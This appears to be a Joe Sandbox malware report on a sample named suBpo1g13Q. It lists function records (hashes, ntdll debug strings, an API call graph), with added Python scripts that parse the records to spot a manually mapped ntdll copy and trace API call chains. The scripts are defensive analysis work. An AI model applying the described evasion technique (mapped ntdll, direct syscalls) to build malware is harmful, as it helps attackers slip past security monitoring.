                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bbe9e85b0b1b12c1f32cab62ce02ec0fd30e8e664dc2bbb7761b7c286800516b
                                                                                                                • Instruction ID: f37f0129a1f86244137ef496f8ee6a2e5a56866e962eda9d620b47e4bc596020
                                                                                                                • Opcode Fuzzy Hash: bbe9e85b0b1b12c1f32cab62ce02ec0fd30e8e664dc2bbb7761b7c286800516b
                                                                                                                • Instruction Fuzzy Hash: 2990023164140502D541715844046060009E7E1241F95C017A1424965EC765CB6AAB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a2d05ee279b6f55274526dd761851baf8eae9d107b60ec69aebe2dadfd34375c
                                                                                                                • Instruction ID: 34483269f2f4850d1c021f40a6a6c4913678e7e739b91221772f586118eb0580
                                                                                                                • Opcode Fuzzy Hash: a2d05ee279b6f55274526dd761851baf8eae9d107b60ec69aebe2dadfd34375c
                                                                                                                • Instruction Fuzzy Hash: C090023160140942D50071584404B460005D7F1301F55C01BA1124A65DC725C9657621
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a5e2840655e8a8ec9e570f2e8fe99f09c670c4d34aacb42b54ae9b409b57896e
                                                                                                                • Instruction ID: f10d0a75820046ef2a8a87fcc4f3dfac1e707a042ccc3158d116a9866d2b3485
                                                                                                                • Opcode Fuzzy Hash: a5e2840655e8a8ec9e570f2e8fe99f09c670c4d34aacb42b54ae9b409b57896e
                                                                                                                • Instruction Fuzzy Hash: 15900221A0540502D540715854187060015D7E1201F55D016A1024965DC769CB6967A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f79657e6ad9303051d6dda32360014672fbd8c5f1b6a9bb778c1fcf1cf108edc
                                                                                                                • Instruction ID: 858c70968940c5a082e8c7e5a8a259dacfc9731fd90516822bac015436ce565a
                                                                                                                • Opcode Fuzzy Hash: f79657e6ad9303051d6dda32360014672fbd8c5f1b6a9bb778c1fcf1cf108edc
                                                                                                                • Instruction Fuzzy Hash: 6D90023160140503D500715855087070005D7E1201F55D416A1424969DD766C9656221
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce875db22bd42b54bb20966d96ae5f4ac1a862e5ef054cac59c4e56449568448
                                                                                                                • Instruction ID: 91d26e08b8229b0af3409571d3593848a27d12c88e69271f55f6b0ce18614019
                                                                                                                • Opcode Fuzzy Hash: ce875db22bd42b54bb20966d96ae5f4ac1a862e5ef054cac59c4e56449568448
                                                                                                                • Instruction Fuzzy Hash: C190023160140502D500759854086460005D7F1301F55D016A6024966EC775C9A56231
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0c81f3b77e97a680efedc222121680bfae0c544d163eba484acb3daad54260ab
                                                                                                                • Instruction ID: 56091d6bc5a4352831860ce35ac859ed36b172e921a0b4d18da7dfa499269a1d
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: c9ca1b67b0bcc1605d1f1095b7de684d32710c16a96dabfb02004eb20203ad4f
• Instruction ID: 65350bc5e064fee78470c8fe52f7762850089f7ed1e7319cfd4e4cd026c3b8f6
• Opcode Fuzzy Hash: c9ca1b67b0bcc1605d1f1095b7de684d32710c16a96dabfb02004eb20203ad4f
• Instruction Fuzzy Hash: B25105B6A04156AFDF12DFAD888497EFBFCBB48241710822AE455D7651D374DE0087A0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 05a99dbe418faabbc0858fce44ec58fe4f57e6bb7105756b76e0196fdd4771b7
• Instruction ID: f6c19c6646765534b7b9bc489b8f7084d7973a33c04ba11d7b532057f672f367
• Opcode Fuzzy Hash: 05a99dbe418faabbc0858fce44ec58fe4f57e6bb7105756b76e0196fdd4771b7
• Instruction Fuzzy Hash: 8651F875A00645EECF60DF6DC8A097EBBF9BB44204F14845FE996CF642E6B4DA008760
Strings
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01514725
• CLIENT(ntdll): Processing section info %ws..., xrefs: 01514787
• Execute=1, xrefs: 01514713
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015146FC
• ExecuteOptions, xrefs: 015146A0
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01514655
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01514742
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                • API String ID: 0-484625025
                                                                                                                • Opcode ID: 51e8eb1b16d411e20a01aac7dce5239b55d248880502b2860f0a443c293544d2
                                                                                                                • Instruction ID: 69acb1fb573d832c22a7e1b2950fedc08f14635ed6326e4a41206069db51aef6
                                                                                                                • Opcode Fuzzy Hash: 51e8eb1b16d411e20a01aac7dce5239b55d248880502b2860f0a443c293544d2
                                                                                                                • Instruction Fuzzy Hash: 13518D3160021A7BEF11ABA9DC95FAE3BB8FF15715F14009FD509AB1E0E770AA028F50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                • Instruction ID: 3fc4ae968be85bb7b54d806b2ad893cd910a3da4e9bd2bb4deada797820af400
                                                                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                • Instruction Fuzzy Hash: E70213B1508742AFE305CF19D895A6FBBE5FFD8700F04892DB9998B260DB31E905CB52
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-$0$0
                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                • Instruction ID: 185cc0b20c9a1af70ed78c468672ac32ad711904e9339d4e8982afad44e71765
                                                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                • Instruction Fuzzy Hash: ED81CE70E452498EEF298E6CC8987BEBBF1FF45322F18421BD891A77A1C6308841CB51
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                • Opcode ID: 46f5c1c97f0976f7057a952dc681aae9c177cb4cf86a346f3d8d81fa6a543def
                                                                                                                • Instruction ID: 79a37053504dcc2424de8fc6e7027256f65268358f85fb9740c393dedbc7230f
                                                                                                                • Opcode Fuzzy Hash: 46f5c1c97f0976f7057a952dc681aae9c177cb4cf86a346f3d8d81fa6a543def
                                                                                                                • Instruction Fuzzy Hash: 7521517AA00119ABDB50DF79DC54ABFBBE9BF54640F08011BEE05E7201E730D9018BA1
                                                                                                                Strings
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015102E7
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015102BD
                                                                                                                • RTL: Re-Waiting, xrefs: 0151031E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                • API String ID: 0-2474120054
                                                                                                                • Opcode ID: 1b398749bdd97b698f3663e6dbaa073d82aa9745c16eb30b60a31b4105ad8c8e
                                                                                                                • Instruction ID: 9988d918bb88c0f1b4e6c068da3a965469f0c07f9c924588406eca8851a09e09
                                                                                                                • Opcode Fuzzy Hash: 1b398749bdd97b698f3663e6dbaa073d82aa9745c16eb30b60a31b4105ad8c8e
                                                                                                                • Instruction Fuzzy Hash: 8EE1DF346047429FE726CF28C884B6ABBE1BB84714F140A1EF5A5CB2E1D778D949CB52
                                                                                                                Strings
                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01517B7F
                                                                                                                • RTL: Resource at %p, xrefs: 01517B8E
                                                                                                                • RTL: Re-Waiting, xrefs: 01517BAC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 0-871070163
                                                                                                                • Opcode ID: 36ab1348f462630981a190892295379c3fde1d8bd2741c7592983d3c11162345
                                                                                                                • Instruction ID: d670ca06054816089e9745c883c4e6d394136375150abc233b7c008f2cc64c7b
                                                                                                                • Opcode Fuzzy Hash: 36ab1348f462630981a190892295379c3fde1d8bd2741c7592983d3c11162345
                                                                                                                • Instruction Fuzzy Hash: 7841D3313007039BDB21DE29C860B6BB7E5FF9A720F110A1EE956DB3A0DB71E4058B91
                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0151728C
                                                                                                                Strings
                                                                                                                • RTL: Resource at %p, xrefs: 015172A3
                                                                                                                • RTL: Re-Waiting, xrefs: 015172C1
                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01517294
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 885266447-605551621
                                                                                                                • Opcode ID: a681b1f6c042bb81d6ebc8bf6a2cd098f45eee358ff998cd1789f203d17e8d3b
                                                                                                                • Instruction ID: d05e20719e132362d7bba95022bfd9a67dc3d36b0c10bd8a9025eafc645e91f6
                                                                                                                • Opcode Fuzzy Hash: a681b1f6c042bb81d6ebc8bf6a2cd098f45eee358ff998cd1789f203d17e8d3b
                                                                                                                • Instruction Fuzzy Hash: 3741D631700603ABDB11DE29CC41FAAB7A5FB99714F11062EF9559B250DB31F85287D1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$]:%u
                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                • Opcode ID: c372e2bbfd730f565bb779e53c5e4d0b2545953460c2d15bcd7e612c28711f78
                                                                                                                • Instruction ID: bfe616788acb240898782c7183326d6a27ef9872ad79a4c1f581c8ea3434b117
                                                                                                                • Opcode Fuzzy Hash: c372e2bbfd730f565bb779e53c5e4d0b2545953460c2d15bcd7e612c28711f78
                                                                                                                • Instruction Fuzzy Hash: 77318472A00219DFDB60DF29CC50BEE77F8FB54610F45459BED49E7201EB30AA488BA0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-
                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                • Instruction ID: e562c5645020a21c97786a464dec81ae18f9649b3cb806437db67194f44f9f9c
                                                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                • Instruction Fuzzy Hash: 54918E71E002169AEF24DF6DC898ABFBBE5AF44333F14461BE955A73E0E73089418791
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $$@
                                                                                                                • API String ID: 0-1194432280
                                                                                                                • Opcode ID: 90f56dcff967c66ac1ce8395aa70b5f449416b4a52ae72d09dea49b8d6666b16
                                                                                                                • Instruction ID: fea832b91ca3c4f940c301dcf20cd4802c4673de063770b359773e8268aaebfd
                                                                                                                • Opcode Fuzzy Hash: 90f56dcff967c66ac1ce8395aa70b5f449416b4a52ae72d09dea49b8d6666b16
                                                                                                                • Instruction Fuzzy Hash: AD811D71D002699BDB35CF94CC44BEEB6B4BB58714F0545EAEA19BB290D7305E84CF60
                                                                                                                APIs
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0152CFBD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallFilterFunc@8
                                                                                                                • String ID: @$@4rw@4rw
                                                                                                                • API String ID: 4062629308-2979693914
                                                                                                                • Opcode ID: 6ef07abdfc7e669893fba1e551832f0a2b8979669deb558570f129bfc3d4a03d
                                                                                                                • Instruction ID: 4f07a312969c67f5539c442059981f0a2d62aa4bd5e22dd6aa8a343ba299292f
                                                                                                                • Opcode Fuzzy Hash: 6ef07abdfc7e669893fba1e551832f0a2b8979669deb558570f129bfc3d4a03d
                                                                                                                • Instruction Fuzzy Hash: 3441B172900225DFDB219FAAC844AADBBF8FF65750F01442EE914DF2A4E774D805CB61
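The entries above are Joe Sandbox IDA plugin function records for the memory dump at base 0x01470000 in PID 4: each carries the dump it came from, the APIs and strings the function references (with their xref addresses), and the Opcode / Instruction fuzzy hashes used for similarity matching. Several of the strings (CLIENT(ntdll): ..., RTL: Enter CriticalSection Timeout ..., RTL: Acquire Exclusive Sem Timeout ...) are debug messages from inside ntdll.dll, so this region holds ntdll code rather than the sample's own logic. Together with the "Found direct / indirect Syscall" signature in the summary, that is consistent with a manually mapped copy of ntdll, a hook-evasion technique FormBook is known for. The parser below is an added example, not part of the report or of Joe Sandbox, that turns this listing into records and flags the ones whose strings are ntdll-internal and whose dump region is private and executable. It assumes the listing format shown on this page and, for the .sdmp file name, that the dotted fields are PID, run, dump id, base, protection, state and type; both assumptions are inferred from the page, not from Joe Sandbox documentation.

```python
import re

# Constructed input: two function records copied from the listing above with the
# leading indentation stripped. The second one has the empty "APIs"/"Strings"
# sections exactly as the page shows them. Example code, not Joe Sandbox tooling.
SAMPLE = """\
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0151728C
Strings
• RTL: Resource at %p, xrefs: 015172A3
• RTL: Re-Waiting, xrefs: 015172C1
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01517294
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: a681b1f6c042bb81d6ebc8bf6a2cd098f45eee358ff998cd1789f203d17e8d3b
• Instruction ID: d05e20719e132362d7bba95022bfd9a67dc3d36b0c10bd8a9025eafc645e91f6
• Opcode Fuzzy Hash: a681b1f6c042bb81d6ebc8bf6a2cd098f45eee358ff998cd1789f203d17e8d3b
• Instruction Fuzzy Hash: 3741D631700603ABDB11DE29CC41FAAB7A5FB99714F11062EF9559B250DB31F85287D1
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: 185cc0b20c9a1af70ed78c468672ac32ad711904e9339d4e8982afad44e71765
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: ED81CE70E452498EEF298E6CC8987BEBBF1FF45322F18421BD891A77A1C6308841CB51
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Bullet grammar per section: "<api> ref: <addr>" under APIs, "<text>, xrefs: <addr>" under Strings.
REF_RES = {"APIs": (re.compile(r"^(.*) ref: (?P<addr>[0-9A-Fa-f]+)$"), "apis"),
           "Strings": (re.compile(r"^(.*), xrefs: (?P<addr>[0-9A-Fa-f]+)$"), "strings")}
# Field names for the .sdmp file name are an ASSUMPTION: the values line up with a
# MEMORY_BASIC_INFORMATION (base, Protect, State, Type); verify against your own reports.
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9a-f]{8})\.(?P<run>[0-9a-f]{8})\.(?P<dumpid>\d+)\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\.(?P<type>[0-9a-f]{8})\.[0-9a-f]{8}\.sdmp"
    r", Offset: (?P<offset>[0-9a-f]+), based on PE: (?P<pe>true|false)$", re.I)
NTDLL_DEBUG_PREFIXES = ("CLIENT(ntdll):", "RTL:")  # debug-print prefixes used inside ntdll.dll


def parse_source_file(value):
    m = SDMP_RE.match(value)
    if not m:
        raise ValueError(f"unrecognised Source File: {value!r}")
    d = {k: int(v, 16) for k, v in m.groupdict().items() if k not in ("dumpid", "pe")}
    d.update(dumpid=int(m["dumpid"]), pe=(m["pe"] == "true"))
    return d


def parse_records(text):
    """Split the listing into records; each record ends at its 'Instruction Fuzzy Hash' line."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            if cur is None:
                cur = {"apis": [], "strings": [], "source": None, "fields": {}}
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue  # blank line or stray text between records
        body = line[1:].strip()
        if section in REF_RES:
            regex, field = REF_RES[section]
            m = regex.match(body)
            if m:
                cur[field].append((m.group(1), int(m["addr"], 16)))
            continue
        key, _, value = body.partition(":")  # first colon only: String IDs contain ':'
        key, value = key.strip(), value.strip()
        if key == "Source File":
            cur["source"] = parse_source_file(value)
        else:
            cur["fields"][key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = None
    return records


def is_private_executable(src):
    # PAGE_EXECUTE_READWRITE == 0x40, MEM_PRIVATE == 0x20000 (field meaning assumed, see SDMP_RE)
    return src["protect"] == 0x40 and src["type"] == 0x20000


def ntdll_internal_records(records):
    """Opcode IDs of functions whose strings are ntdll debug messages. Found in a
    private executable region (is_private_executable) that is the footprint a
    manually mapped ntdll copy leaves, which the direct/indirect-syscall signature hints at."""
    return [r["fields"]["Opcode ID"] for r in records
            if any(t.startswith(NTDLL_DEBUG_PREFIXES) for t, _ in r["strings"])]
```

Run parse_records over the whole function listing of a report (indentation is stripped per line, so the page's copy can be pasted as-is) and join the resulting records on Instruction Fuzzy Hash to find the same functions in dumps of other samples; the xref addresses are absolute, so subtract the record's source base before comparing them across runs where the region lands elsewhere.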

                                                                                                                Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 4.4%
Signature Coverage: 2.3%
Total number of Nodes: 435
Total number of Limit Nodes: 71
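The execution_graph block that follows is a flat token stream: "<node id> <address> [API name ...]" defines a node and "a->b" is an edge, with line breaks falling anywhere (the report wraps one line between "839e3e" and "CreateProcessInternalW"). Nodes labelled with an API (NtAllocateVirtualMemory, CreateProcessInternalW, LdrLoadDll, NtClose, RtlAllocateHeap, ...) are the points at which the emulated code reaches a Windows API; addresses such as 47d2ca0 lie outside the dumped region. The script below is an added example, not part of the report or of Joe Sandbox, that parses the stream and answers the question an analyst usually has at this point: which call chain reaches a given API. Its grammar is inferred from this listing only, the excerpt it ships with is constructed from the first entries plus the CreateProcessInternalW entry, and edges whose endpoints fall outside the excerpt are kept but rendered as unknown rather than guessed.

```python
import re
from collections import defaultdict, deque

# Constructed input: the first node entries of the report's execution_graph dump
# plus the CreateProcessInternalW entry, copied from the page (the full graph has
# 435 nodes). The newline after "839e3e" reproduces the line wrap in the report.
EXCERPT = """
101557 81ba80 101560 83ba50 101557->101560 101559 81d0f1 101563 839b90
101560->101563 101562 83ba81 101562->101559 101564 839c22 101563->101564
101566 839bb8 101563->101566 101565 839c35 NtAllocateVirtualMemory
101564->101565 101565->101562 101566->101562 101567 82138b 101568 821393
PostThreadMessageW 101567->101568 101569 82139f 101567->101569 101568->101569
101766 839e10 101740->101766 101767 839e2d 101766->101767 101768 839e3e
CreateProcessInternalW 101767->101768 101768->101743
"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")


def parse_graph(text):
    """Tokenise the dump: '<id> <address> [API ...]' defines a node, 'a->b' is an edge.
    The grammar is inferred from the listing itself (an assumption), so a node id is
    recognised as a decimal token and the token right after it is its address; that is
    what keeps an all-digit address such as 826840 from being mistaken for a node id."""
    nodes, edges, pending, current = {}, [], None, None
    for tok in text.split():
        if pending is not None:               # token after a node id is its address
            current = {"id": pending, "addr": tok, "apis": []}
            nodes[pending] = current
            pending = None
        elif (m := EDGE_RE.match(tok)):
            edges.append((m.group(1), m.group(2)))
        elif NODE_ID_RE.match(tok):
            pending = tok
        elif current is not None:             # anything else labels the current node
            current["apis"].append(tok)
        else:
            raise ValueError(f"label {tok!r} before any node")
    if pending is not None:
        raise ValueError(f"node {pending} has no address (truncated dump?)")
    return nodes, edges


def api_callers(nodes, api):
    return sorted(n["id"] for n in nodes.values() if api in n["apis"])


def find_path(edges, src, dst):
    """Shortest call chain src -> ... -> dst (BFS over the edge list), or None."""
    adj = defaultdict(list)
    for a, b in edges:
        adj[a].append(b)
    prev, queue = {src: None}, deque([src])
    while queue:
        cur = queue.popleft()
        if cur == dst:
            path = []
            while cur is not None:
                path.append(cur)
                cur = prev[cur]
            return path[::-1]
        for nxt in adj[cur]:
            if nxt not in prev:
                prev[nxt] = cur
                queue.append(nxt)
    return None


def describe(nodes, path):
    """Render a path with addresses; ids that only occur as edge endpoints (nodes
    outside this excerpt, e.g. 101740) are marked '(?)' rather than guessed."""
    out = []
    for nid in path:
        n = nodes.get(nid)
        out.append(f"{nid}(?)" if n is None else " ".join([n["addr"], *n["apis"]]))
    return " -> ".join(out)


if __name__ == "__main__":
    nodes, edges = parse_graph(EXCERPT)
    for api in ("NtAllocateVirtualMemory", "CreateProcessInternalW"):
        for nid in api_callers(nodes, api):
            path = find_path(edges, "101557", nid)
            print(api, nid, describe(nodes, path) if path else "not reachable from 101557")
```

On the full dump the same three calls give, for each API of interest, the chain of function addresses in the 0x01470000 region that leads to it; those addresses can then be looked up in the function records above (the Opcode ID / fuzzy hash entries) to see which strings and imports sit on that path.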

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
